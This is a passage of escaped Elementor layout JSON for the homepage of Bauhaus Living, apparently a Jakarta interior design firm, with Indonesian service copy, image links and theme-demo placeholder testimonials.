},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-20,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-5,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]},\"_offset_x_widescreen\":{\"size\":114},\"_offset_y_end_widescreen\":{\"size\":-20}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"79c1a30\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-9402.jpg\",\"id\":4790,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":216,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":80,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-59,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"05b98db\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"slideInRight\",\"animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"animation_delay\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"2659e25\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"ABOUT US\",\"title\":\"WELCOME TO BAUHAUS\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"23\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"d5a8088\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Tingkatkan Kualitas Hidup Anda dengan Bauhaus Living!<\\/p>\",\"text_color\":\"#050404\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"30\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"4\",\"isLinked\":false},\"_border_color\":\"#E3B25A\",\"_background_background\":\"classic\",\"_background_color\":\"#FDFDFD\",\"_box_shadow_box_shadow_type\":\"yes\",\"_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":6,\"blur\":10,\"spread\":-3,\"color\":\"rgba(0, 0, 0, 0.32)\"}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ae9c19e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Sejak tahun 2005, Bauhaus Living telah menjadi pilihan utama untuk solusi desain interior berkualitas tinggi di Jakarta dan sekitarnya. Dengan pengalaman yang telah teruji dalam menangani lebih dari 300 proyek residential dan commercial, kami siap membawa keindahan, kenyamanan, dan kepribadian ke dalam ruang Anda.<\\/p><p>Kami tidak hanya menciptakan desain interior yang estetis, tetapi juga mengubah ruang tempat tinggal atau tempat kerja Anda menjadi cerminan karakter dan selera pribadi Anda.<\\/p><p>Setiap proyek kami adalah sebuah karya seni yang unik, menggabungkan fungsionalitas dengan gaya, sehingga menciptakan lingkungan yang memikat dan berkelas.<\\/p><p>maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.<\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"95d1537\",\"elType\":\"widget\",\"settings\":{\"text\":\"More\",\"background_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"40\",\"bottom\":\"20\",\"left\":\"40\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/about\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_z_index\":2,\"_transform_keep_proportions_hover\":\"\",\"_transform_skewX_effect_hover\":{\"unit\":\"px\",\"size\":105,\"sizes\":[]},\"__dynamic__\":[]},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e3b46\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"background_color\":\"#F5F5F5\",\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-service-home-1.png\",\"id\":3938,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"center center\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"cover\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.05,\"sizes\":[]},\"overlay_blend_mode\":\"darken\",\"padding\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_background\":\"classic\"},\"elements\":[{\"id\":\"689d32b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6fd54ec\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"25\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-flip\",\"animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"animation_delay\":500},\"elements\":[{\"id\":\"afefcf5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":57.862},\"elements\":[{\"id\":\"41871d7\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"SERVICES WE DO\",\"title\":\"\\n interior design consultant & contractor \",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":true},{\"id\":\"8ca80a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":42.097,\"align\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67cca64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>- Konsultasi perencanaan &amp; interior design<\\/p><p>- Penyusunan Rencana Anggaran Belanja<\\/p><p>- Produksi furniture dan pekerjaan sipil<\\/p>\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0da118d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5d9734c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"77ba3ef\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b51484b\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-15\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3d8a96c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0f00906\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\"Introducing outstanding new projects\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"f665bb7\",\"elType\":\"widget\",\"settings\":{\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-120\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"pulse\",\"_animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"post_per_page\":3,\"order_by\":\"ova_sev_met_order_sev\",\"order\":\"ASC\",\"target_blank\":\"\"},\"elements\":[],\"widgetType\":\"ovasev_elementor_service_box\"},{\"id\":\"b4fd990\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"ova_elementor_project_filter_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"145a686\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-whychoose.png\",\"id\":2116,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center left\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"gap\":\"no\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"8460a70\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":45,\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"80\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"space_between_widgets\":15},\"elements\":[{\"id\":\"5229c85\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our benefits\",\"title\":\"Why Bauhaus Living ?\",\"description\":\"Setiap proyek kami adalah sebuah karya seni yang unik, menggabungkan fungsionalitas dengan gaya, sehingga menciptakan lingkungan yang memikat dan berkelas.\",\"align_heading\":\"left\",\"color_title\":\"#FFFFFF\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"color_sub_title\":\"#B1B1B1\",\"color_description\":\"#C2C2C2\",\"show_line_text\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"e6bce61\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Konsultasi gratis oleh team profesional\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"7113fdf\"},{\"text\":\"Interior design yang mewakili keunikan setiap klien\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"e6ab069\"},{\"text\":\"Design + Build Service menjadi kualitas pekerjaan \",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#FFFFFF\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"600\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":0.6,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"9c7a64c\",\"elType\":\"widget\",\"settings\":{\"title\":\"Kepuasan Pelanggan\",\"percent\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"042a87b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Kualitas Hasil dan Layanan\",\"percent\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"}],\"isInner\":false},{\"id\":\"2ae20b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":55,\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"css_classes\":\"retirio_stretch_column_right\",\"_inline_size_tablet\":100,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ca11226\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-5878-scaled.jpg\",\"id\":4796,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"width_tablet\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":580,\"sizes\":[]},\"object-fit_tablet\":\"cover\",\"image_size\":\"full\",\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":800,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"458230c\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"be465bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0c50faf\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"Apa kata mereka tentang Bauhaus?\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-17\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"27fa0e5\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"4735f8c\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"71b5562\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-line-yellow.png\",\"id\":1422,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#DDAD58\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"705dd08\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"8eb7d44\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"23b7d8f\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"6c7e338\"}],\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-280\",\"left\":\"0\",\"isLinked\":false},\"icon_quote\":{\"value\":\"flaticon flaticon-quotes\",\"library\":\"flaticon\"},\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"cf6d2b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"e73dd09\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"127b5e7\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"163297c\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"bcfaaf7\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"80c4005\"}],\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"dot_control\":\"yes\",\"_animation\":\"bounceInUp\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f7c9652\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"327\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"297\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"77dbf66\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080887e\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our process\",\"title\":\"4 easy work steps\",\"_animation\":\"ova-move-down\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"_animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"_animation_delay\":100},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"ec83ee9\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"90\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"a992324\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":150,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_ypos\":{\"unit\":\"px\",\"size\":-1,\"s